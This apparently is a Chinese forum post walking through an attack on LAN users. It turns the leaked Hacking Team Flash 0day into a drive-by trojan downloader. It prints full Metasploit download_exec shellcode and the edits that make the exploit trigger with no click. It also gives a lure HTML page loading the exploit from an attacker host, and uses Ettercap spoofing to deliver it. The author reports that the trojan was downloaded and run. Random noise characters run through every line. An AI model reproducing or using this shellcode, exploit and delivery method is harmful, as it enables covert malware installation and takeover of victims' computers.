|
5 H+ S) e) z* \; G/ ?& x4 u2 u 三、flash 0day之手工代码修改制作下载者实例入侵演示 / }$ s# l t o g9 \0 V
5 F. C6 K `3 |
# ~( o& K) R- f9 K" ^ I. W; [ 利用到的工具:
! O% m4 e/ r* }: `5 w& d & \& w! T2 c4 Z: N$ ^
3 Q4 C& Z8 r* H( } Msf
; w$ [1 w8 `: s# }; u) ~% |( Y! y1 j 2 _( r' z4 m6 H8 A& A
6 `( W, Z1 S V
Ettercap 1 [0 m3 j& \- h3 i1 t, n
" A' M; `) {2 Z# S+ E
) H: @9 s9 \/ u3 ]: w+ S6 i3 H Adobe Flash CS6
, t2 ?( O% ?8 L0 b # o) K9 ~) d6 p
4 {! g: g) x; b3 E" N
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
8 ]7 _6 T) A. d & c" S! a' f2 \" N
# j) J9 X u5 g- m5 y t
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options 0 h# C0 Q6 s, @' q" z
# a% `! P4 @& |, j. r5 O6 m0 h' U+ l/ M5 Q! i+ l3 o
如图: ! a& f+ V& \: P3 p* N6 N; h1 k4 h
R0 V) U5 j3 ~" g$ B, {& [$ n9 |5 b, x5 J2 m9 g
9 z5 a, }: R3 G( E4 X- Z
# I7 ~6 Q8 V' E1 J8 S
4 w+ A9 X2 R9 Z, P8 R  * {& S2 |9 e& {
2 H7 O$ X) x" R, H1 f# G' w7 j7 L9 w! \0 h: C) `
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: * Q; B! @7 s6 ]$ |
. Z5 [4 g1 J2 j8 R+ o5 p* x* k& j/ j& T& v; ]9 d
9 O1 S& g! J2 c: J; `9 H
, ~: W2 V( _3 o. g j
. X# e: ^, v4 p. R* Y# ?  ; u" M9 k) }' }( h
6 M% k. T2 S4 Q' Z
% ~& t5 ^, F$ p1 S, Z9 f# d
然后执行generate -t dword生成shellcode,如下:
5 z: U/ N) R, g; K ! Y' `" M- g' B- J! @" H7 ^
4 Z3 K; A( ~9 y  ! Y5 F0 m+ b/ W, n9 D
/ ^0 T3 L7 Z4 M5 |, c* x9 S5 m/ s: t2 O0 R
复制代码到文本下便于我们一会编辑flash exp,如下: 2 h+ {+ |4 b/ L% g" R& s
, L' [ y% ?! B3 N% |% f3 p! Z
$ v+ X+ ?- G8 G: d
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, # D4 ^/ H8 h6 r0 I4 r
; x$ c2 m" ^# {/ q
: d4 p+ U3 Z6 ~, u2 o" W9 I; d 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, : q: d$ h ~- J
( Y3 S2 M* T6 H+ e" Y" ~6 |+ x+ W& V
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ; ^0 U+ [8 r) e+ H a! U
% o& m; c7 S2 C" |( Y
7 j2 v/ [ b* \ 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, B/ l9 g) R" K+ e7 X1 c3 Z3 ~
0 A( z4 a, l- W8 a0 Z
) e+ n* T: X$ \3 b" }
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
4 I8 v% q2 o3 O. h! b; ~! e * g' _; g! c- l9 Z. ^9 F. u! @ N
: y4 R: v* }# w* o/ n! C7 ~+ [
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, . z1 G; N ` j
# P6 L! v& H5 U9 B* \
2 Y/ G; F) E: ^! s 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
6 H) B" z/ _- u- `
( H& z+ X6 S# w+ H! D2 ^5 B
5 h$ p6 g2 L& m. A% F 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
0 ?' a, L) ]& v/ L3 n
! n. o/ J1 H$ \8 q
, s) t* |' `1 }. l 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 9 O5 A7 z9 C" Q9 {
( l; g2 [" _5 G
/ o( |) S7 }: x8 x2 g 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
) `6 X# n* n5 [5 n; r" J( t 9 X3 {* f: a" h* C# E- C3 m5 r
% s$ `* ?3 k: J4 C
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, / t: j( S5 |1 K8 c( m1 `
2 ]6 W) [: w! V! B' H
) w' l* f2 t4 V& R- T 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
; [4 ^; L# `7 A. T+ C" u9 ]
, f! O" H9 y, }2 s0 w7 N1 p H z) p$ E; T6 [) B4 p. o2 z
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
' x) L. _. @# H2 R% y8 T! \ * c. o8 p `0 l! u: Y2 _
1 z; v; `& ^: S" X. Y 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
% d2 Q* Y" ^ m
$ z( h; d4 y& N% Q0 G* h: K8 K2 K% |
+ I( V+ N, P. A* }
% ?( \8 P! v5 a. F# ` & n: ]# b2 U6 c: c3 w6 G. \
/ X% H8 W1 O. G G/ z j, K( S
- X* x2 j' M5 h) r! ^. a ; Q2 e% A5 m. H7 W5 p- c9 T) i
$ `! b, t' @% ?+ m' q4 V% H; ? 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
$ Z" c, Q, P* _8 O9 d- u3 ~
9 i) C- h `% Z8 X9 [4 [% f3 y& [3 _1 I9 ^# g( z
7 y! @- S! }" [6 T+ u7 F; N# g4 q
" Y: b2 T0 @. l& G+ R0 J
$ `4 ?) U) F( M 先修改ShellWin32.as,部分源代码如图: ; X; r9 O- d c6 K# d( q2 f [
* B/ v4 p6 _+ G
; j, ~7 X0 k, b; Q* J  1 p* M; z k' R! c% |
; J" U/ K+ j1 O; H
* A5 a: q1 M7 R6 C 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: . M/ f2 v s4 G0 y: s/ h( N
& r4 t: j0 m* F( u- n( h) i/ b( R! p" ` Z( }) \
y r) g. S3 w; u
; m$ v9 \7 F" O3 e
5 C7 \- C' Y7 H 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
$ d. s' c6 b% R; P( u) J) p r
. ~+ ?9 ^' s3 I( u1 L+ C' n! r5 {4 b, i& f6 U
 0 l! v* w% j+ _
% l! B" M+ y9 q
! G0 |2 ~; J! w5 B. J- b 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: ( L5 |2 V4 D% k1 d1 p
; [- F2 r1 H' l( S+ y% w% A% x2 K( {
; X6 Y8 e' D) d" C, H * X0 h( n" {& J. w
/ `2 l0 d; A- F S( G0 D* |. s0 Q' c: }: W" X
) W( @7 ~) u' V# O2 v
: \) D+ e# f; I- P2 Q0 d
/ f" d) j' n# _6 b 
! U- R, M$ H, [& t$ s+ w
! k$ ^. v; `2 ~7 a
. {2 ?9 l4 u l( R. j, z 然后点保存,下面我们来编译一下,打开 % X1 t* y" V5 D5 z p' s" h
- N; w4 j( t; l' n3 [. O# F
+ a+ S6 z& f4 B( e/ ~/ ]% S exp1.fla然后点文件-发布,看看编译没错误
) O9 J2 v8 n5 g# Y: s3 H C; O7 H+ l : N+ S {& f9 W+ C( C, u
& E( V9 u, |# a' U9 g0 M ' @$ ]; l3 Y( L$ u7 M6 |1 @
% v8 \$ t" {9 ^9 m/ _, Y6 Q8 ?
+ L7 {- N8 o- k/ F
8 U5 J% n$ m# E" Y8 F/ ~: O ( o+ F# I5 T& Q% g
- X8 j" H7 a$ p5 d0 S$ b* J' r' K
% c8 h6 J! X$ x: U$ b. U$ I3 A : T6 G0 z0 d3 I! G$ r. q9 |% g- O
. a& O/ ?+ g# L2 L, `& ~  ( q8 o! p2 q( G( E
/ a& @, h9 G7 u3 `9 X5 D. C
2 p; n; m7 W7 R9 F& O. l. `2 ~ 然后我们把生成的
' z# A, b2 b) U" z0 W$ L4 l
, V0 {/ ?- [) V: ]* h8 n# \$ S/ P7 ^
6 W! @& y5 V5 g2 s- l- s' N: \ exp1.swf丢到kailinux 的/var/www/html下:
$ X$ [9 Y2 \/ l% g8 ^" U
5 p5 f3 x* t e0 f4 g
4 v' L) B/ l0 |/ r6 d 然后把这段代码好好编辑一下
4 |( G6 U9 ?; H: ?: C4 ~* Z; Z 0 h8 [" w3 o% M4 S9 h& S
9 L# [5 `# }2 f: Z3 L
+ I& ?( _" j( s7 H! D / V0 A$ [' v6 w: j
) M+ L6 b3 y) c4 I N. U; a3 f% c2 S; w/ j* Q4 }
9 W2 y* v6 {! n6 i, ~# a$ v# Z ~0 W6 c8 d
, B+ @: ]/ a, H* z6 P3 @
/ Y: n5 O9 S% p
0 z7 X e6 d0 ]2 a; W
& f5 G5 Z5 P4 z. M 5 V6 S* l; T) G# q. C2 w% V, }6 R
( o6 l- r: z; |$ r
9 o5 t2 g6 @ U0 ], y/ h
( E' x% L F3 z) R# N8 k, e$ B; o# t" r4 c- d$ x
. u* V: }+ q0 H' a. T# K
$ ]! @) h* m3 b. w+ `) ^" h) `5 j& a
<!DOCTYPE html> ! @) {0 Q+ d# \" `( v/ J6 w8 N
6 a5 M- b" r; _" h
6 p8 A0 ]5 \4 M" D6 H1 T0 F) B) ] <html>
# v! m* P1 n; c1 A" I ` & U4 a: z5 u& T% }2 g2 U
! f. _, u9 V5 Z' E# Q1 b
<head> + e; `0 g5 W3 G% p9 k% f
0 S4 D) v6 ` q, A# j: a3 p# b2 Z6 m; M9 o" {; a- c( r
<meta http-equiv="Content-Type" content="text/html;
% ^6 @ m- n+ S$ @0 g; o
1 n# _0 B6 c/ e* ^7 R: i( g' h8 G5 k. c
charset=utf-8"/> 4 H$ r; q2 E7 X
6 ~/ x$ g6 } l% Y! u t' z9 D, [ N+ n* S7 R' j
</head>
, j! }0 U, b& M! E# n. w & H2 \* v1 U6 W8 W. A; b
' D4 e2 O. g, g$ _
<body>
) Y- N, \2 Z7 S; ~, Z 2 e1 D# ^9 l& ^
% x9 Q* @+ E0 {* z6 k3 R
<h2> Please wait, the requested page is loading...</h2> : ?( t4 G6 E8 h# p) \
2 L1 k$ X. s/ \& t% J8 M( T
o. I5 D8 g4 a$ p$ P( n <br> - }9 W' r6 T. F) u$ w; {
# x* _5 p0 @/ Z6 p9 S* q* x5 [0 p
$ n+ T# a, w' X+ ?
<OBJECT 7 h% U' @- D' p6 ~: c$ D
" `* T; C, i5 K T- D) W! b. d6 d1 O8 E3 U2 v
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
' c4 H D. o- z( D1 i K9 B4 J
2 ?& t5 l8 J+ M5 G4 E% _
4 G5 ]$ d2 J' f( @* P VALUE="http://192.168.0.109/exp1.swf"></OBJECT> + H) i4 V7 S; n6 u; ^
$ A4 t% q1 v5 @2 E4 u
# W/ B: T3 {. {$ C1 K/ N, z </body>
3 Z7 @+ Q; d. r, C% s/ u5 g2 \7 B% m 5 X1 s6 K4 y( f- y4 U
( U2 ?) X' ?6 J <script>
" C! Z; a) ]+ ]. D
# Q" \5 l) O; N! n
5 [) M, J0 Z7 J8 P5 ?( j setTimeout(function () {
, {, n s# N% e# E0 K6 Q0 } ~' a ( @! }+ d+ m, q0 j
% l% U) O& F; d" \
2 C4 ^2 u: b) ^- _3 A9 h
% h7 |7 x' M. {4 x% @5 f d
% e# B5 L9 p, | S% S# u# R
window.location.reload(); 3 S- ~& N% z$ C$ i! V$ T
! u1 n" {3 q' \; S$ M
# ^! s) Q* A) X/ g. [ }, 10000);
5 w6 y5 |' |* j, e2 P7 F$ x4 J
1 G5 ]$ c- n' t
3 k, X4 N/ k1 u; \9 [
- p( @, v3 J! f4 {" v {
- V' e/ J* q0 r) p
& m" p/ @( D3 ], i# V </script>
2 z9 O% v8 U2 K J7 t0 s( k 9 R! f* m- W- F, I7 w# G
: [' u( U1 u! Z# `9 _. c' X2 M
</html> ' p$ o; J6 E2 k# a
2 F/ G7 u" p7 i* r- a
1 U5 w T; f; {1 A 6 c- n% ^* u, f2 _5 s- ~4 M8 Y: L
% K" R1 x5 Y+ T v2 r
$ U9 h: t, E' J, f 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: & ?) J/ I( \% o: V& u) e
2 N$ P6 W3 R2 W$ }3 g+ U( T( c- t) ` M. `( G" D
 1 Q7 N3 ~9 c! F2 j3 p) u
- P! O' O" T% R5 C+ R
0 R# M, _+ p, L! N' r1 B7 Y, f! S 1 E6 n4 V2 R1 Y- F
+ u: ?* M; I6 k7 q- \. \: L4 G8 W
i5 y, ^/ o) D
. c' Z% n6 u8 d: x0 N" X
# w( @( z/ K1 ?5 v; u5 l& \
$ p2 U) e4 {6 @- \" H l * C7 q) P( f3 I: ]1 x* u4 D& S# g' p# [
' V. M8 F4 O6 ]5 }( b! \' X- i8 s$ ?: m8 \/ G6 ^( Q% G
* b4 n: T) p9 O. s
* ]% p7 ^) C6 ?4 a+ v: ]
( x1 B. d7 y' x. h) H: d 下面我们用ettercap欺骗如图:
4 _1 \' U$ a2 K+ v& N$ n& ]: w , G1 H& J- _3 }$ Q) h( x+ P k
& s7 g: l q D' N4 k* L
( e6 \5 j p- A. g
( O2 m$ D2 J0 j" A! }9 |! D' ]* n0 Q) Y8 `% H& r
8 b7 j, c. S" W0 k " `9 x8 Q# O, Q
* `; K2 ^$ Q: s7 W) a( L E
下面我们随便访问个网站看看:
& L4 S2 I+ V5 S$ E8 @6 ]0 e7 k $ [; f( @7 n! P4 C8 {! O% q |; B
/ [! x: m% o$ b! O% }* ^
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 2 e4 S; W( z9 }. O
% k; n/ k6 V l+ K$ R. l& M
0 O8 _' @, i0 ^' z" N4 d$ _  " C1 X5 [7 K0 L% ], F) {
! \3 Y# J/ p! ]! u$ _
* h/ n! N- {$ w2 h1 h 我们看另一台, 7 Y; W q) h) c9 p D2 r
1 t. K1 U( q* C
: R$ D# Y) Q8 T$ h 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 ! S1 t* D' m g! E" i" _& Y
| 
发表于 2018-10-20 20:28:55
收藏
支持
反对